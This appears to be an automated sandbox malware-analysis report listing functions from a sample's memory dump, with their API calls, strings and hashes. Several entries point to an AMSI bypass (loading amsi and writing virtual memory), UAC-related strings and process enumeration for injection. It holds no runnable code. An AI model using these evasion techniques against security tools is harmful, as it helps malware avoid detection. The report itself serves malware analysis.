String ID:
API String ID: 2151042543-0
Opcode ID: 7dbce2e2f52f1c4f07fc6c2ae1b343662f987a7b1a50cd6396b419309073db8e
Instruction ID: cb3ad302a324d2bdd380704e6b65f7c20691c6d5732d5e6108bfa6fd597f3d0d
Opcode Fuzzy Hash: 7dbce2e2f52f1c4f07fc6c2ae1b343662f987a7b1a50cd6396b419309073db8e
Instruction Fuzzy Hash: A901F732684704AEE711FF64DC52C6F7BBCEB4A700B51D475F90DE2690E6308A10C960

Function 02E71724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02E717D0
Sleep.KERNEL32(0000000A,00000000), ref: 02E717E6

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7457ff7aba56d92c588f83b27334ffe417c1fe7d6ee2dc57c22f59e3965eaf09
Instruction ID: 75df70d7d0ced00c0fc06bdd6cddfbe67190ee6a79516ff37e10fe81338c9f15
Opcode Fuzzy Hash: 7457ff7aba56d92c588f83b27334ffe417c1fe7d6ee2dc57c22f59e3965eaf09
Instruction Fuzzy Hash: C0B13372A803808BCB15CF69E880356BBE1EBC6315F19D6AEE64D8F3C5C7709591CB90

Function 02E888C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02E888C9

Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1

Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E88928

Strings

W, xrefs: 02E888D5
DllGetClassObject, xrefs: 02E888EE
amsi, xrefs: 02E888C4

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 525c7767cf8edce06ed1b7ce3f8db8ab7b8976226492a2ee9545c7f482f237c3
Instruction ID: 3f87d7636bac5bd18679bcd733d1a23cfab97a47b6ab24fc0ccbbd7495563bb0
Opcode Fuzzy Hash: 525c7767cf8edce06ed1b7ce3f8db8ab7b8976226492a2ee9545c7f482f237c3
Instruction Fuzzy Hash: 5AF0A45008C381B9D301F3788C45F4FBACE4B62234F40DA58B1EC5A2D2D675D0048BB7

Function 02E71A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02E71FE4), ref: 02E71B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E71FE4), ref: 02E71B31

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3da2c8f405cb1ce38377a09ea3e6d11e433d41d219973e077ae93321d898f93d
Instruction ID: 8fbe34759c8bf7543345d5f8144bd62b4ae775a82688cf3940b797177c53362b
Opcode Fuzzy Hash: 3da2c8f405cb1ce38377a09ea3e6d11e433d41d219973e077ae93321d898f93d
Instruction Fuzzy Hash: BA51C0716803408FDB15CF68D984756BBE4AB86318F18D5AEE54CCF2C2E770D885CBA1

Function 02E8E4B2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E8E5F2

Strings

ScanBuffer, xrefs: 02E8E53B
OpenSession, xrefs: 02E8E594
Initialize, xrefs: 02E8E4E2

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 862b57f7b098c1e4441960bb520294549a2d8f96e213c94081cf7ed6329cf35d
Instruction ID: 5804c6f0eeab01b611432e3b5f05d0a77477d44d1189b0c565a9a5fc35857f14
Opcode Fuzzy Hash: 862b57f7b098c1e4441960bb520294549a2d8f96e213c94081cf7ed6329cf35d
Instruction Fuzzy Hash: 03411B35B901099FEB01FBA4D841A9EB3FAEF98700F60E465F489A7291DA30AD01CF51

Function 02E7E36C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 02E7E37B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 051dfa4cbc8c88f5a2495e2a4dd16aa04fc1b6c26bd27ada772dd821cb850051
Instruction ID: 24729fb1a51bb348a7ca29c77707cebb510629792208d7faec3e0120fab41488
Opcode Fuzzy Hash: 051dfa4cbc8c88f5a2495e2a4dd16aa04fc1b6c26bd27ada772dd821cb850051
Instruction Fuzzy Hash: 02F0F6207C4110A7D7207B38CCC46AD279AAF44708B58F4F6F586AB145CB38CC85CBA2

Function 02E870E4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 02E873E2

Strings

H, xrefs: 02E87199

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 38d1b92e62e265768bffffd63d642b142764ab1ab8d5cfb0fd1680aa390f71ac
Instruction ID: d4f5c30bb87b5641b2839ea4a71ef77e163cb41c0662eeddb281c4d3177ac330
Opcode Fuzzy Hash: 38d1b92e62e265768bffffd63d642b142764ab1ab8d5cfb0fd1680aa390f71ac
Instruction Fuzzy Hash: 73B1F278A816089FDB15DF99D880A9DFBF2FF89314F24D169E849AB320D730A845CF51

Function 02E7E768 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02E7E789

Part of subcall function 02E7E36C: VariantClear.OLEAUT32(?), ref: 02E7E37B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 72a175295789a6b5dedc885391dad22bb6499748787ba2df5a7db401d28ff194
Instruction ID: 7f28d315e4de915ade8601f65df17073a6fc2cf6fbc134e76726b8f2fe0bfc6d
Opcode Fuzzy Hash: 72a175295789a6b5dedc885391dad22bb6499748787ba2df5a7db401d28ff194
Instruction Fuzzy Hash: F711822178021487EB20AB29D9C46A777DAAF85754B1CF4EBF54ACF259DB30CC40CB62

Function 02E7E404 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 02E7E444

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 47d3a525a343be44c43f173bb682543f51eb446db2163e78964601deb8e6301f
Instruction ID: ca6a8ac8f44cb4bcb00fd068523acb4e37b0d960a81581c91febf7c8448695ff
Opcode Fuzzy Hash: 47d3a525a343be44c43f173bb682543f51eb446db2163e78964601deb8e6301f
Instruction Fuzzy Hash: 1C315271A80109AFEB14DF98C885AAA77F8EB0D314F4C94B5FA09D7150F734D950CB61

Function 02E86D74 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02E86DC1,?,?,?,00000000), ref: 02E86DA1

Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 3139dd6cd018d157f67b371234db3a3ffcce112109c4dc24dbf223c904089293
Instruction ID: f5a1d03b6927bdd8a3337be3c7792ab125f6f09aab1fbc7a1644545514cd7f64
Opcode Fuzzy Hash: 3139dd6cd018d157f67b371234db3a3ffcce112109c4dc24dbf223c904089293
Instruction Fuzzy Hash: BBE06531684218BBE711FB62DC51D5E77ADDF8B710F51E471F54493690EA746D048860

Function 02E75868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E75886

Part of subcall function 02E75ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E70000,02E9E790), ref: 02E75AE8
Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B06
Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B24
Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E75B42
Part of subcall function 02E75ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E75B8B
Part of subcall function 02E75ACC: RegQueryValueExA.ADVAPI32(?,02E75D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001), ref: 02E75BA9
Part of subcall function 02E75ACC: RegCloseKey.ADVAPI32(?,02E75BD8,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E75BCB

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: 23894863168c528746574c8f76bbde84fdd5ff6fa9e35fa33bcc602ad2d923b7
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: 51E06D71A403148FDB10DE98C8C0B4633D8AB08754F449961EC98CF246D7B0D9108BE0

Function 02E77E64 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02E9041B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,UacScan,02EF7380,02E9B7B4,UacInitialize), ref: 02E77E6F

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction ID: 8541b8306b1c51814362c42c8c4fddc62f0911c3fc4831664e3c6aaaa7110318
Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction Fuzzy Hash: 3BC08CB03912000A1A90E6FC1CC450942C98A0413C3A4BE29B428C62E1D33298A32810

Function 02E9C358 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02E9C34C,00000000,00000001), ref: 02E9C368

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 06d55a7643c8a139a471104b29c89ee67f71725310d0b15dc7aeeee163d0bc6d
Instruction ID: bf876b71381f013085f639159ad96e9e51e4e4a96a33d1d62a1da63122f125fc
Opcode Fuzzy Hash: 06d55a7643c8a139a471104b29c89ee67f71725310d0b15dc7aeeee163d0bc6d
Instruction Fuzzy Hash: 17C04CB07D03006AF91065695C82F23659D9349751F206452B6049D2D1D1A248504A14

Function 02E715CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E71A03), ref: 02E715E2

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5db356f40560ae3fb3ee14f7542d296e27d8c2ed07d1b51bd45aab4ac497559
Instruction ID: d31e6c25bfe5f83802e0967a03f83054a1a6d22fc644d3c9667be85dcf212102
Opcode Fuzzy Hash: c5db356f40560ae3fb3ee14f7542d296e27d8c2ed07d1b51bd45aab4ac497559
Instruction Fuzzy Hash: 55F037F0B813004FDB8ACFBA99413026AE6EBCA348F60C579E709DB2C8E77194418B00

Function 02E71682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E716A4

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d8dd8eac89da206c44e9a4a585d2ec5df9eadc29cd986d4da3a2981d3dc61a08
Instruction ID: 2a9bb254a6eb3d037e5d488049e9a6c70e9c8916cdde9b629769db524cf0dd8d
Opcode Fuzzy Hash: d8dd8eac89da206c44e9a4a585d2ec5df9eadc29cd986d4da3a2981d3dc61a08
Instruction Fuzzy Hash: DAF0B4B2B807956BD7109F5ADC80782BB98FB40314F454139FA5C9B384D770A850CB94

Function 02E716E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E71FE4), ref: 02E71704

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: adade83549b59f3ff5b0671e6c83fcd314fcf0aea13e1fca9f086111547a0329
Instruction ID: fda680293609048a6357e6c262fbb1c78fe0540366c44ee11b9492cfb5b76498
Opcode Fuzzy Hash: adade83549b59f3ff5b0671e6c83fcd314fcf0aea13e1fca9f086111547a0329
Instruction Fuzzy Hash: 8AE0C275380301AFEB205FBE5D80B52BBDDEB99664F24D476F609DF291D2B0E8109B60

Non-executed Functions

Function 02E8AB18 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E8AD9F,?,?,02E8AE31,00000000,02E8AF0D), ref: 02E8AB2C
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E8AB44
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E8AB56
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E8AB68
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E8AB7A
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E8AB8C
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E8AB9E
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E8ABB0
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E8ABC2
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E8ABD4
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E8ABE6
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E8ABF8
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E8AC0A
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E8AC1C
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E8AC2E
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E8AC40
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E8AC52

Strings

Heap32Next, xrefs: 02E8AB84
Thread32Next, xrefs: 02E8AC02
Process32First, xrefs: 02E8ABA8
Module32NextW, xrefs: 02E8AC4A
kernel32.dll, xrefs: 02E8AB27
Thread32First, xrefs: 02E8ABF0
Module32Next, xrefs: 02E8AC26
Process32NextW, xrefs: 02E8ABDE
Heap32First, xrefs: 02E8AB72
Module32FirstW, xrefs: 02E8AC38
Process32Next, xrefs: 02E8ABBA
CreateToolhelp32Snapshot, xrefs: 02E8AB3C
Module32First, xrefs: 02E8AC14
Heap32ListFirst, xrefs: 02E8AB4E
Heap32ListNext, xrefs: 02E8AB60
Process32FirstW, xrefs: 02E8ABCC
Toolhelp32ReadProcessMemory, xrefs: 02E8AB96

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: e391a7685d6f9d14d759c42665889c4dd5b2cad67b06ae8c0ff2320e4d908b67
Instruction ID: 1a28706757843aaebb3a9597058682ea388dcd4d056a9fd401a3c81da1e17db0
Opcode Fuzzy Hash: e391a7685d6f9d14d759c42665889c4dd5b2cad67b06ae8c0ff2320e4d908b67
Instruction Fuzzy Hash: D131FFF0AC07509FEF40FFE5D884A2577A9A745705B80AD76B949CF304E678A454CF12

Function 02E88D6C Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON

Download Yara Rule

APIs

